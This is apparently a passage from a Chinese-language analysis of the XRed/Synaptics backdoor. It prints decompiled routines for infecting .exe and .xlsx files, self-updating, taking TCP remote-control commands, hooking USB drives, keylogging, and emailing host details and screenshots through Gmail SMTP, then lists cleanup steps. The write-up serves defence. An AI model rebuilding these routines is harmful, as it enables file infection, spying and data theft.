LStrCatN(&dest, 3, ptr_Synaptics_exe_49D6AC, "\\", Synaptics_appdir_49F144);
if ( exec_473490(v7, dest, "InjUpdate", v9, v8) )
goto LABEL_6;
}
__writefsdword(0, Handle);
__writefsdword(0, v17[0]);
v18 = &loc_498B0D;
return LStrArrayClr(&v23, 4);
}
5、在Synaptics目錄下時
監控&傳輸&感染指定檔案handle_49A098
5.1 感染特定目錄 inj_SpecialFolder_49834C
遍歷目錄,感染exe 和xlsx 檔案
int __fastcall inj_SpecialFolder_49834C(void *a1, void *a2, void *a3)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v36 = _InterlockedExchange(&v37, a3);
v3 = a2;
v37 = a1;
v22 = &savedregs;
v21[1] = &loc_49863B;
v21[0] = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, v21);
LOBYTE(a2) = 1;
v35 = TObject_Create(VMT_418BE4_TStringList, a2);
LOBYTE(v4) = 1;
v34 = TObject_Create(VMT_418BE4_TStringList, v4);
if ( v3 )
{
v20 = &savedregs;
v19 = &loc_4984DA;
ExceptionList = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, &ExceptionList);
// CSIDL_PERSONAL
Get_SpecialFolder_4730FC(5, &System__AnsiString);
// CSIDL_DESKTOP
Get_SpecialFolder_4730FC(6, &v32);
// Downloads
Get_SpecialFolder_4730FC(7, &v31);
if ( DirectoryExists(System__AnsiString) )
sub_4742BC(System__AnsiString, ".exe", v35, 1);
if ( DirectoryExists(v32) )
sub_4742BC(v32, ".exe", v35, 1);
if ( DirectoryExists(v31) )
sub_4742BC(v31, ".exe", v35, 1);
// TStringList_GetCount
v5 = (*(*v35 + 0x14))(v35);
if ( v5 - 1 >= 0 )
{
v6 = v5;
v7 = 0;
do
{
// TStringList_Get
(*(*v35 + 0xC))(v35, v7, &v29);
LStrCat3(&v30, "Injecting -> ", v29);
str_add_4967D4(v37, v30);
++v7;
--v6;
}
while ( v6 );
}
inj_exe_4776D4(v35, ptr_EXERESX_49D6B8, ptr_EXEVSNX_49D6BC, I_EXEVSNX_49F14C, 1);
// TStringList_GetCount
v8 = (*(*v35 + 0x14))(v35);
if ( v8 - 1 >= 0 )
{
v9 = v8;
v10 = 0;
do
{
// TStringList_Get
(*(*v35 + 0xC))(v35, v10, &v28);
if ( v28 )
{
// TStringList_Get
(*(*v35 + 0xC))(v35, v10, &v27);
str_add_4967D4(v37, v27);
}
++v10;
--v9;
}
while ( v9 );
}
TObject_Free(v35);
__writefsdword(0, ExceptionList);
}
if ( v36 )
{
v20 = &savedregs;
v19 = &loc_498616;
ExceptionList = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, &ExceptionList);
Get_SpecialFolder_4730FC(5, &System__AnsiString);
Get_SpecialFolder_4730FC(6, &v32);
Get_SpecialFolder_4730FC(7, &v31);
if ( DirectoryExists(System__AnsiString) )
sub_4742BC(System__AnsiString, ".xlsx", v34, 1);
if ( DirectoryExists(v32) )
sub_4742BC(v32, ".xlsx", v34, 1);
if ( DirectoryExists(v31) )
sub_4742BC(v31, ".xlsx", v34, 1);
// TStringList_GetCount
v11 = (*(*v34 + 0x14))(v34);
if ( v11 - 1 >= 0 )
{
v12 = v11;
v13 = 0;
do
{
// TStringList_Get
(*(*v34 + 0xC))(v34, v13, &v25);
LStrCat3(&v26, "Injecting -> ", v25);
str_add_4967D4(v37, v26);
++v13;
--v12;
}
while ( v12 );
}
inj_excel_479748(v34);
v14 = (*(*v34 + 0x14))(v34);
if ( v14 - 1 >= 0 )
{
v15 = v14;
v16 = 0;
do
{
// TStringList_Get
(*(*v34 + 0xC))(v34, v16, &v24);
if ( v24 )
{
// TStringList_Get
(*(*v34 + 0xC))(v34, v16, &v23);
str_add_4967D4(v37, v23);
}
++v16;
--v15;
}
while ( v15 );
}
TObject_Free(v34);
__writefsdword(0, ExceptionList);
}
__writefsdword(0, v21[0]);
v22 = &loc_498642;
return LStrArrayClr(&v23, 0xB);
}
inj_exe
int __fastcall inj_exe_4776D4(void *a1, void *a2, void *a3, int a4, void *a5)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v26 = _InterlockedExchange(&v28, a3);
v27 = a2;
v28 = a1;
LStrAddRef(a2);
LStrAddRef(v26);
v11 = &savedregs;
v10 = &loc_4778DD;
ExceptionList = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, &ExceptionList);
if ( (*(*v28 + 0x14))(v28, *v28) >= 1 )
{
v5 = (*(*v28 + 0x14))(v28) - 1;
if ( v5 >= 0 )
{
v24 = v5 + 1;
v25 = 0;
do
{
(*(*v28 + 0xC))(v28, v25, &v23);
if ( FileExists(v23) )
{
ExceptionList = &savedregs;
v8[1] = &loc_47789F;
v8[0] = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, v8);
(*(*v28 + 0xC))(v28, v25, &v22);
v6 = LStrToPChar(v22);
hmodule_49EC78 = kernel32_LoadLibraryA(v6);
if ( find_res_4770E4(hmodule_49EC78, v26) )
{
read_res_47717C(hmodule_49EC78, v26, &System__AnsiString);
if ( StrToInt(System__AnsiString) >= a4 )
{
kernel32_FreeLibrary_0(hmodule_49EC78);
(*(*v28 + 0xC))(v28, v25, &v13);
LStrCat3(&v14, "Infected Canceled -> ", v13);
(*(*v28 + 0x20))(v28, v25, v14);
}
else
{
(*(*v28 + 0xC))(v28, v25, &v17, 1);
copy_res_4774A8(v17, v27, a5);
(*(*v28 + 0xC))(v28, v25, &v15);
LStrCat3(&v16, "Vrs Updated -> ", v15);
(*(*v28 + 0x20))(v28, v25, v16);
}
}
else
{
kernel32_FreeLibrary_0(hmodule_49EC78);
(*(*v28 + 0xC))(v28, v25, &v21, 0);
copy_res_4774A8(v21, v27, a5);
(*(*v28 + 0xC))(v28, v25, &v19);
LStrCat3(&v20, "Completed -> ", v19);
(*(*v28 + 0x20))(v28, v25, v20);
}
__writefsdword(0, v8[0]);
}
++v25;
--v24;
}
while ( v24 );
}
}
__writefsdword(0, v10);
v12 = &loc_4778E4;
LStrArrayClr(&v13, 0xB);
return LStrArrayClr(&v26, 2);
}
inj_excel
//未分析
5.2 自動更新 Auto_Update_498270
定時執行更新服務端配置
int __fastcall Auto_Update_498270(Controls::TWinControl *a1, char flag_AutoUpdate, char a3, int a4)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
if ( flag_AutoUpdate )
{
if ( !*(a1 + 0xC7) )
*(a1 + 0xC7) = TTimer_Create(VMT_42F470_TTimer);
TTimer_SetInterval(*(a1 + 0xC7), 0x3E8 * a4);
TTimer_SetOnTimer(Auto_Update_Timer_498248, a1);
LOBYTE(v5) = 1;
TTimer_SetEnabled(*(a1 + 0xC7), v5);
if ( a3 )
Auto_Update_Timer_498248(a1, a1, v6);
return str_add_4967D4(a1, "Auto Update -> Active");
}
else
{
result = *(a1 + 0xC7);
if ( result )
{
TTimer_SetEnabled(result, 0);
return str_add_4967D4(a1, "Auto Update -> Deactive");
}
}
return result;
}
訪問服務端,有更新時下載配置到快取目錄 隨機字串(9個字元).ini 檔案中
透過ShellExecuteExA附帶引數InjUpdate再次啟動,結束本程序
int __stdcall thread_InjUpdate_497CF0()
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v16[2] = &savedregs;
v16[1] = &loc_49814B;
v16[0] = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, v16);
kernel32_Sleep_0(0xEA60u);
Get_TempPath_4737B0(&v31);
v15 = v31;
randomstr_472D44(9, &v30);
LStrCatN(&lpFile, 4, ".exe", v30, "\\", v15);
Get_TempPath_4737B0(&v29);
v14 = v29;
randomstr_472D44(7, &v28);
LStrCatN(&dest, 4, ".ini", v28, "\\", v14);
v32 = 0;
if ( Internet_GetConnectedState_474D34() )
{
// 下載ini 更新服務端配置
v34 = 1;
while ( 1 )
{
if ( v34 == 1 || v34 == 2 || v34 == 3 )
LStrLAsg(&v33, dword_49F174);
v11 = &savedregs;
v10 = &loc_497F86;
ExceptionList = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, &ExceptionList);
// Güncelleme Denetleniyor...
// Update under review...
str_add_4967D4(dword_49F13C, aG);
if ( http_get_474D50(v33, dest) )
break;
// Update Not Found
str_add_4967D4(dword_49F13C, aG_0);
__writefsdword(0, ExceptionList);
if ( ++v34 == 4 )
goto LABEL_13;
}
LOBYTE(v0) = 1;
v1 = TCustomIniFile_Create(VMT_4300A8_TIniFile, v0, dest);
v8 = 0;
v7 = &v26;
// TIniFile_ReadString
(**v1)(v1, "CS", "VER", 0, &v26);
sub_4758E8(v26, s_EXEVSNX_49F1C8, &v27);
LStrAsg(&s_EXEVSNX_49F1C8, v27);
v8 = 0;
v7 = &v24;
// TIniFile_ReadString
(**v1)(v1, "CS", "PORT", 0, &v24);
sub_4758E8(v24, PORT_49F15C, &v25);
LStrAsg(&PORT_49F15C, v25);
v8 = 0;
v7 = &v22;
// TIniFile_ReadString
(**v1)(v1, "CS", "EXEURL1", 0, &v22);
sub_4758E8(v22, EXEURL1_49F168, &v23);
LStrAsg(&EXEURL1_49F168, v23);
v8 = 0;
v7 = &v20;
(**v1)(v1, "CS", "EXEURL1", 0, &v20);
sub_4758E8(v20, dword_49F16C, &v21);
LStrAsg(&EXEURL1_49F168, v21);
v8 = 0;
v7 = &v18;
(**v1)(v1, "CS", "EXEURL1", 0, &v18);
sub_4758E8(v18, dword_49F170, &v19);
LStrAsg(&EXEURL1_49F168, v19);
v2 = StrToInt(PORT_49F15C);
sub_4957B4(tcp_act_49F140, v2);
if ( StrToInt(s_EXEVSNX_49F1C8) <= I_EXEVSNX_49F14C )
// Güncelleme Bulunamadý
// Update Not Found
str_add_4967D4(dword_49F13C, aG_0);
else
v32 = 1;
TObject_Free(v1);
DeleteFile(dest);
__writefsdword(0, ExceptionList);
LABEL_13:
if ( v32 )
{
v34 = 1;
while ( 1 )
{
switch ( v34 )
{
case 1:
LStrLAsg(&v33, EXEURL1_49F168);
break;
case 2:
LStrLAsg(&v33, dword_49F16C);
break;
case 3:
LStrLAsg(&v33, dword_49F170);
break;
}
v11 = &savedregs;
v10 = &loc_498104;
ExceptionList = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, &ExceptionList);
// Yeni Sürüm Ýndiriliyor...
// New Version Downloading...
str_add_4967D4(dword_49F13C, unk_49820C);
if ( http_get_474D50(v33, lpFile) )
break;
__writefsdword(0, ExceptionList);
if ( ++v34 == 4 )
goto LABEL_34;
}
ControlCenter_49A3E0(dword_49F13C, 0);
v3 = flag_APPIsAdmin_49F148 || byte_49F149 != 0;
v8 = &savedregs;
v7 = &loc_4980E6;
v6 = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, &v6);
get_win_ver_472EF0(&v17);
LStrCmp(v17, "XP");
if ( v4 )
{
if ( !exec_473490(hwnd, lpFile, "InjUpdate", 0, 0) )
{
LABEL_32:
__writefsdword(0, v6);
__writefsdword(0, ExceptionList);
goto LABEL_34;
}
}
else if ( !exec_473490(hwnd, lpFile, "InjUpdate", v3, 0) && !exec_473490(hwnd, lpFile, "InjUpdate", 0, 0) )
{
goto LABEL_32;
}
TApplication_Terminate(*Application[0]);
goto LABEL_32;
}
}
LABEL_34:
__writefsdword(0, v12);
v13 = &loc_498152;
LStrArrayClr(&v17, 0xF);
LStrClr(&v33);
return LStrArrayClr(&lpFile, 2);
}
5.3 tcp_client 命令獲取、執行
CheckMe
int __fastcall sub_495BD4(void *a1)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v12 = 0;
v9 = &savedregs;
v8 = &loc_495D23;
ExceptionList = (unsigned int)NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, (unsigned int)&ExceptionList);
// TIdTCPConnection_Connected
if ( (*(unsigned __int8 (__fastcall **)(Idtcpclient::TIdTCPClient *, _DWORD))(*(_DWORD *)TIdTCPClient_49F114 + 0x54))(
TIdTCPClient_49F114,
*(_DWORD *)TIdTCPClient_49F114) )
{
TTimer_SetEnabled(dword_49F134, 0);
// TIdTCPConnection_WriteLn
(*(void (__fastcall **)(Idtcpclient::TIdTCPClient *, const char *))(*(_DWORD *)TIdTCPClient_49F114 + 0x7C))(
TIdTCPClient_49F114,
"CheckMe");
ExceptionList = 0xFFFFFFFF;
v6 = &v12;
// TIdTCPConnection_ReadLn
(*(void (__fastcall **)(Idtcpclient::TIdTCPClient *, const char *, unsigned int, unsigned int, int *))(*(_DWORD *)TIdTCPClient_49F114 + 0x70))(
TIdTCPClient_49F114,
"\n",
0xFFFFFFFF,
0xFFFFFFFF,
&v12);
ExceptionList = (unsigned int)&savedregs;
v6 = (int *)&loc_495CD3;
v5 = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, (unsigned int)&v5);
LStrCmp(v12, "GetCMDAccess");
if ( v2 )
sub_495DD0(a1);
LStrCmp(v12, "GetScreenImage");
if ( v2 )
sub_495F14(a1);
LStrCmp(v12, "ListDisk");
if ( v2 )
sub_495FDC(a1);
LStrCmp(v12, "ListDir");
if ( v2 )
sub_4960C8(a1);
LStrCmp(v12, "DownloadFile");
if ( v2 )
sub_496254(a1);
LStrCmp(v12, "DeleteFile");
if ( v2 )
sub_496400(a1);
v3 = v5;
__writefsdword(0, (unsigned int)v5);
LOBYTE(v3) = 1;
TTimer_SetEnabled(dword_49F134, v3);
}
else
{
TTimer_SetEnabled(dword_49F134, 0);
//連線失敗則透過http 訪問afraid.org/api 獲取tcp host和port
kernel32_CreateThread_0(0, 0, re_httpget_tcpclient_495930, 0, 0, &ThreadId);
}
__writefsdword(0, (unsigned int)v8);
v10 = &loc_495D2A;
return LStrClr(&v12);
}
DWORD __stdcall re_httpget_tcpclient_495930(LPVOID lpThreadParameter)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
memset(v12, 0, sizeof(v12));
v11 = v1;
v10 = v3;
v9 = v2;
v8 = &savedregs;
v7[1] = (unsigned int)&loc_495B6E;
v7[0] = (unsigned int)NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, (unsigned int)v7);
kernel32_Sleep_0(0x3E8u);
if ( sub_474D34() )
{
str_add_4967D4(*gvar_0049DBDC[0], (int)"Server Connecting...");
v6[2] = (unsigned int)&savedregs;
v6[1] = (unsigned int)&loc_495A09;
v6[0] = (unsigned int)NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, (unsigned int)v6);
if ( LStrPos("afraid.org/api", tcp_host_49F118) )
{
// afraid.org/api
http_get_474FC0(tcp_host_49F118, (int)&v13);
sub_475110(v13, 0x7C, 1, (int)&v14);
LStrAsg(&tcp_host_49F118, v14);
}
// TIdTCPClient_SetHost
(*(void (__fastcall **)(Idtcpclient::TIdTCPClient *, int, void *))(*(_DWORD *)TIdTCPClient_49F114 + 0x88))(
TIdTCPClient_49F114,
tcp_host_49F118,
*(void **)TIdTCPClient_49F114);
// TIdTCPClient_SetPort
(*(void (__fastcall **)(Idtcpclient::TIdTCPClient *, int, void *))(*(_DWORD *)TIdTCPClient_49F114 + 0x8C))(
TIdTCPClient_49F114,
tcp_post_49F124,
*(void **)TIdTCPClient_49F114);
// TIdTCPClient_Connect
(*(void (__fastcall **)(Idtcpclient::TIdTCPClient *, int, void *))(*(_DWORD *)TIdTCPClient_49F114 + 0x94))(
TIdTCPClient_49F114,
dword_49F12C,
*(void **)TIdTCPClient_49F114);
__writefsdword(0, v6[0]);
}
else
{
LOBYTE(v4) = 1;
TTimer_SetEnabled(dword_49F134, v4);
}
__writefsdword(0, v7[0]);
v8 = (int *)&loc_495B75;
return LStrArrayClr(v12, 6);
}
5.4 USB_Hooks
int __fastcall USB_Hooks_496E18(int a1, unsigned __int8 a2)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
System__AnsiString = 0;
v11 = 0;
v10 = &savedregs;
v9[1] = (unsigned int)&loc_49702A;
v9[0] = (unsigned int)NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, (unsigned int)v9);
if ( (a2 & (*(_DWORD *)(a1 + 0x314) == 0)) != 0 )
*(_DWORD *)(a1 + 0x314) = TOrtusShellChangeNotifier_Create(VMT_45E2AC_TOrtusShellChangeNotifier);
if ( a2 )
{
v8[2] = (unsigned int)&savedregs;
v8[1] = (unsigned int)&loc_496FE6;
v8[0] = (unsigned int)NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, (unsigned int)v8);
LStrCat3(&System__AnsiString, Synaptics_appdir_49F144, "\\WS");
if ( !(unsigned __int8)DirectoryExists(System__AnsiString) )
{
LStrCat3(&v11, Synaptics_appdir_49F144, "\\WS");
CreateDir(v11);
}
TCollection_Clear(*(Classes::TCollection **)(*(_DWORD *)(a1 + 0x314) + 0xEE));
v4 = sub_45F1B4(*(Classes::TCollection **)(*(_DWORD *)(a1 + 0x314) + 0xEE));
LStrCat3((void *)(v4 + 0xC), Synaptics_appdir_49F144, "\\WS");
*(_BYTE *)(v4 + 0x10) = 1;
v5 = *(_DWORD *)(a1 + 0x314);
*(_DWORD *)(v5 + 0x32) = 0;
*(_DWORD *)(v5 + 0x36) = 0;
*(_DWORD *)(v5 + 0x3A) = 0;
*(_DWORD *)(v5 + 0x3E) = 0;
*(_DWORD *)(v5 + 0x42) = 0;
*(_DWORD *)(v5 + 0x46) = 0;
*(_DWORD *)(v5 + 0x4A) = 0;
*(_DWORD *)(v5 + 0x4E) = 0;
*(_DWORD *)(v5 + 0x56) = a1;
*(_DWORD *)(v5 + 0x52) = Drive_Added_497080;
*(_DWORD *)(v5 + 0x5A) = 0;
*(_DWORD *)(v5 + 0x5E) = 0;
*(_DWORD *)(v5 + 0x66) = a1;
*(_DWORD *)(v5 + 0x62) = Drive_Removed_4971A8;
*(_DWORD *)(v5 + 0x6A) = 0;
*(_DWORD *)(v5 + 0x6E) = 0;
*(_DWORD *)(v5 + 0x72) = 0;
*(_DWORD *)(v5 + 0x76) = 0;
*(_DWORD *)(v5 + 0x7A) = 0;
*(_DWORD *)(v5 + 0x7E) = 0;
*(_DWORD *)(v5 + 0x82) = 0;
*(_DWORD *)(v5 + 0x86) = 0;
*(_DWORD *)(v5 + 0x8A) = 0;
*(_DWORD *)(v5 + 0x8E) = 0;
*(_DWORD *)(v5 + 0x92) = 0;
*(_DWORD *)(v5 + 0x96) = 0;
*(_DWORD *)(v5 + 0x9A) = 0;
*(_DWORD *)(v5 + 0x9E) = 0;
*(_DWORD *)(v5 + 0xA2) = 0;
*(_DWORD *)(v5 + 0xA6) = 0;
*(_DWORD *)(v5 + 0xAA) = 0;
*(_DWORD *)(v5 + 0xAE) = 0;
*(_DWORD *)(v5 + 0xB2) = 0;
*(_DWORD *)(v5 + 0xB6) = 0;
*(_DWORD *)(v5 + 0xBA) = 0;
*(_DWORD *)(v5 + 0xBE) = 0;
*(_DWORD *)(v5 + 0xC2) = 0;
*(_DWORD *)(v5 + 0xC6) = 0;
*(_DWORD *)(v5 + 0xCA) = 0;
*(_DWORD *)(v5 + 0xCE) = 0;
TOrtusShellChangeNotifier_SetActive(v5, 1);
str_add_4967D4(a1, (int)"USB Hooks -> Active");
__writefsdword(0, v8[0]);
}
else
{
v6 = *(_DWORD *)(a1 + 0x314);
if ( v6 )
{
TOrtusShellChangeNotifier_SetActive(v6, 0);
str_add_4967D4(a1, (int)"USB Hooks -> Deactive");
}
}
__writefsdword(0, v9[0]);
v10 = (int *)&loc_497031;
return LStrArrayClr(&v11, 2);
}
5.5 Directory_Watcher
監控我的文件、桌面、下載 目錄,監控.exe和.xlsx字尾的檔案
if ( (_BYTE)flag_Directory_Watcher )
{
// CSIDL_PERSONAL
Get_SpecialFolder_4730FC(5, (int)&System__AnsiString);
// CSIDL_DESKTOP
Get_SpecialFolder_4730FC(6, (int)&v36);
// Downloads
Get_SpecialFolder_4730FC(7, (int)&v35);
if ( (unsigned __int8)DirectoryExists(System__AnsiString) )
Drive_Watcher_496A40((int)v38, (void *)System__AnsiString, 0, 0);
if ( (unsigned __int8)DirectoryExists((const int)v36) )
Drive_Watcher_496A40((int)v38, v36, 0, 0);
if ( (unsigned __int8)DirectoryExists((const int)v35) )
Drive_Watcher_496A40((int)v38, v35, 0, 0);
// .exe .xlsx
Directory_Watcher_496B94((int)v38, 1);
}
else
{
Directory_Watcher_496B94((int)v38, 0);
}
5.6 鍵盤記錄 Keyboard_hook
釋放資源KBHKS 到Synaptics.dll,呼叫HookOn、HookOff
if ( (_BYTE)is_Keyboar_Hook )
{
v14 = TKBLogger_Create(VMT_476248_TKBLogger, 1, Synaptics_appdir_49F144, ptr_Synaptics_dll_49D6B0);
*((_DWORD *)v38 + 0xBF) = v14;
Handle = TWinControl_GetHandle(v38);
LOBYTE(v16) = 1;
Keyboard_hook_4764E4(v14, v16, Handle);
str_add_4967D4((int)v38, (int)"Keyboard Hook -> Active");
}
else
{
v17 = *((_DWORD *)v38 + 0xBF);
if ( v17 )
{
v18 = TWinControl_GetHandle(v38);
Keyboard_hook_4764E4(v17, 0, v18);
str_add_4967D4((int)v38, (int)"Keyboard Hook -> Deactive");
}
}
int __fastcall Keyboard_hook_4764E4(int a1, void *a2, int a3)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v21 = 0;
v20 = &savedregs;
v19[1] = (unsigned int)&loc_476697;
v19[0] = (unsigned int)NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, (unsigned int)v19);
if ( (_BYTE)a2 )
{
release_KBHKS_47671C((void *)a1, a2, Synaptics_dll_49EC58);
v6 = (const CHAR *)LStrToPChar(dword_49EC5C);
*(_DWORD *)(a1 + 0x40) = kernel32_LoadLibraryA(v6);
if ( !*(_DWORD *)(a1 + 0x40) )
{
LStrCat3(&v21, "X", Synaptics_dll_49EC58);
release_KBHKS_47671C((void *)a1, a2, v21);
v7 = (const CHAR *)LStrToPChar(dword_49EC5C);
*(_DWORD *)(a1 + 0x40) = kernel32_LoadLibraryA(v7);
}
*(_DWORD *)(a1 + 0x44) = kernel32_GetProcAddress_0(*(HMODULE *)(a1 + 0x40), "HookOn");
*(_DWORD *)(a1 + 0x48) = kernel32_GetProcAddress_0(*(HMODULE *)(a1 + 0x40), "HookOff");
if ( !*(_DWORD *)(a1 + 0x44) || !*(_DWORD *)(a1 + 0x48) )
{
LOBYTE(v8) = 1;
v9 = Exception_Create(VMT_408034_Exception, v8, aDllFonksiyonuB);
RaiseExcept(v9);
}
FileMappingA = kernel32_CreateFileMappingA((HANDLE)0xFFFFFFFF, 0, 4u, 0, 4u, "ElReceptor");
*(_DWORD *)(a1 + 0x30) = FileMappingA;
if ( !FileMappingA )
{
LOBYTE(v11) = 1;
v12 = Exception_Create(VMT_408034_Exception, v11, aDosyaOlu);
RaiseExcept(v12);
}
v13 = kernel32_MapViewOfFile(*(HANDLE *)(a1 + 0x30), 2u, 0, 0, 0);
*(_DWORD *)(a1 + 0x38) = v13;
*v13 = a3;
v14 = kernel32_CreateFileMappingA((HANDLE)0xFFFFFFFF, 0, 4u, 0, 4u, "CBReceptor");
*(_DWORD *)(a1 + 0x34) = v14;
if ( !v14 )
{
LOBYTE(v15) = 1;
v16 = Exception_Create(VMT_408034_Exception, v15, aDosyaOlu);
RaiseExcept(v16);
}
v17 = kernel32_MapViewOfFile(*(HANDLE *)(a1 + 0x34), 2u, 0, 0, 0);
*(_DWORD *)(a1 + 0x3C) = v17;
*v17 = a3;
// HookOn
(*(void (__cdecl **)())(a1 + 0x44))();
}
else
{
if ( *(_DWORD *)(a1 + 0x48) )
// HookOff
(*(void (__cdecl **)())(a1 + 0x48))();
if ( *(_DWORD *)(a1 + 0x40) )
kernel32_FreeLibrary_0(*(HMODULE *)(a1 + 0x40));
if ( *(_DWORD *)(a1 + 0x30) )
{
kernel32_UnmapViewOfFile(*(LPCVOID *)(a1 + 0x38));
kernel32_UnmapViewOfFile(*(LPCVOID *)(a1 + 0x3C));
kernel32_CloseHandle_0(*(HANDLE *)(a1 + 0x30));
kernel32_CloseHandle_0(*(HANDLE *)(a1 + 0x34));
}
}
__writefsdword(0, v19[0]);
v20 = (int *)&loc_47669E;
return LStrClr(&v21);
}
5.7 郵件傳送 Auto_Mail_Sender_4974E4
透過stmp傳送主機資訊
if ( (_BYTE)flag_Auto_Mail_Sender )
{
v28 = 1;
v19 = StrToInt(dword_49F1C4);
Auto_Mail_Sender_4974E4((int)v38, v19, 1, v28);
}
else
{
v28 = 0;
v20 = StrToInt(dword_49F1C4);
Auto_Mail_Sender_4974E4((int)v38, v20, 0, v28);
}
int __fastcall sub_497290(int a1)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v9 = &loc_49743D;
ExceptionList = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, (unsigned int)&ExceptionList);
if ( !*(_DWORD *)(a1 + 0x300) )
*(_DWORD *)(a1 + 0x300) = TSendMail_Create(
(int)VMT_494B1C_TSendMail,
1,
(int)Synaptics_appdir_49F144,
dword_49F18C,
dword_49F190,
dword_49F194);
if ( Internet_GetConnectedState_474D34() )
{
v7 = (const char *)&savedregs;
v6 = &loc_497418;
v5 = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, (unsigned int)&v5);
sub_477050(*(_DWORD *)(a1 + 0x2FC), &dest);
(*(void (__fastcall **)(void *, void *, void *))(**(_DWORD **)(a1 + 0x30C) + 0x1C))(
*(void **)(a1 + 0x30C),
&v21,
**(void ***)(a1 + 0x30C));
LStrCatN(&dest, 6, v21, v13, v14, v15, System__AnsiString, v17);
sub_494D10(*(_DWORD *)(a1 + 0x300), (int)"smtp.gmail.com", (int)"465", dword_49F198, dword_49F19C);
v12 = dest;
v11 = dword_49F1A0;
v10 = "XRed57 > ";
// GetComputerName
Get_ComputerName_472E18((int)&v19);
v9 = v19;
ExceptionList = (_EXCEPTION_REGISTRATION_RECORD *)" : ";
// mac
get_Netbios_475658((int)&v18);
LStrCatN(&v20, 4, v18, ExceptionList, v9, v10);
v6 = (void *)v20;
// GetUserNameA
Get_UserNameA_472E58((int)&v17);
Set_EMailAddresses_494EB8(*(_DWORD *)(a1 + 0x300), v17, (int)v6, (int)ExceptionList, (int)v7);
Get_TempPath_4737B0((int)&v14);
ExceptionList = v14;
v7 = "\\";
randomstr_472D44(8, &v13);
LStrCatN(&v15, 4, ".jpg", v13, v7, ExceptionList);
//截圖
screen_4752EC(v15, (int)&System__AnsiString);
sub_494F84(*(_DWORD *)(a1 + 0x300), System__AnsiString, 1);
do_Mail_Send_49546C(*(_DWORD *)(a1 + 0x300), v2, v3);
__writefsdword(0, (unsigned int)v5);
}
__writefsdword(0, (unsigned int)ExceptionList);
v10 = (const char *)&loc_497444;
return LStrArrayClr(&v13, 0xA);
}
TFormVir_FormClose
退出
int __fastcall TFormVir_FormClose(Controls::TWinControl *a1)
{
return ControlCenter_49A3E0(a1, 0);
}
處置
0 、不要插隨身碟
1、結束程序Synaptics.exe
2、刪除自啟動項
-
計算機\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
-
計算機\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
下的Synaptics Pointing Device Driver 以及對應檔案
3、刪除目錄
- 刪除登錄檔項以及設定的目錄
HKEY_LOCAL_MACHINE (管理員時) 或者HKEY_CURRENT_USER 下Software\Synaptics\APPDir 值設定的目錄
- C:\ProgramData\Synaptics
4、清理/恢復我的文件、桌面、下載 下的exe和xlsx檔案
目錄下存在._cache_加檔名 則修改檔名可恢復
不存在時需提取EXERESX資源
excel檔案感染,與RCData中XLSM資源合併,大概是宏,